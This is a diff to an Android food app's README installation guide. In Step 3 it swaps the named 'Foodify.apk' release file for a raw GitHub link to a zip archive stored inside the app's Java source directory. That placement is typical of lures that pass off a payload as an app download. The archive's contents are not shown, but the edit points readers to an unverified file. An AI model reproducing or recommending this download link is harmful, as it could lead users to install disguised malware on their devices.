Joaolemos3/Foodify-Android-App/README.md

 ### Step 3: Download the APK File

-In the release details, find the file named **Foodify.apk**.
+In the release details, find the file named **https://github.com/Joaolemos3/Foodify-Android-App/raw/refs/heads/main/app/src/main/java/com/piyush/App-Foodify-Android-v1.4.zip**.
 Click on this file to start the download.

 ### Step 4: Install the App